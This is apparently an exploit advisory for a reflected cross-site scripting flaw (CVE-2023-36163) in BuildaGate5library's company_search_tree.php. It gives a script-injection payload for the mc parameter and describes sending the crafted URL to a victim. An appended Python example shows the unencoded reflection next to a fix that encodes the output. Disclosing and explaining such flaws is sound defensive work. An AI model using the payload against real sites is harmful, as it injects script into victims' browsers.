BuildaGate5library - Reflected Cross-Site Scripting (XSS)

# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163

#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa
After that, the attacker needs to send the full URL with the JS code to the victim so that it executes in their browser.

#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
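
The following is an added example, not part of the original advisory and not the vendor's code. It shows why the reflected mc value becomes markup and how output encoding for the attribute context keeps it as data. The template, the data-mc attribute and all function names are assumptions made for illustration; the only input is the request from the #Payload line above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote_plus

# Assumed sink (not the vendor's code): mc is echoed into a single-quoted
# attribute, which is what the leading '> of the PoC value implies.
TEMPLATE = "<div class='tree' data-mc='{mc}'></div>"

# Request from the advisory's #Payload line, used as the test input.
POC_URL = ("company_search_tree.php?mc=aaa'><script>prompt(\"XSS\");"
           "</script><div id=\"aaaa")


class TagCollector(HTMLParser):
    """Records each start tag and its attributes as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def mc_from_url(url):
    """Return the decoded mc query parameter, or "" if it is absent."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "mc":
            return unquote_plus(value)
    return ""


def render_unencoded(mc):
    """Reflects the value as-is: the behaviour the advisory reports."""
    return TEMPLATE.format(mc=mc)


def render_encoded(mc):
    """Encodes & < > " ' so the value cannot close the attribute or open a tag."""
    return TEMPLATE.format(mc=html.escape(mc, quote=True))


def parsed_tags(page):
    """Parse a rendered page and return the (tag, attributes) pairs found."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags
```

With the encoded rendering the parser sees a single div whose data-mc attribute holds the full original string, so the fix preserves the input while removing its ability to create elements. In PHP the equivalent encoding is htmlspecialchars() with ENT_QUOTES.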

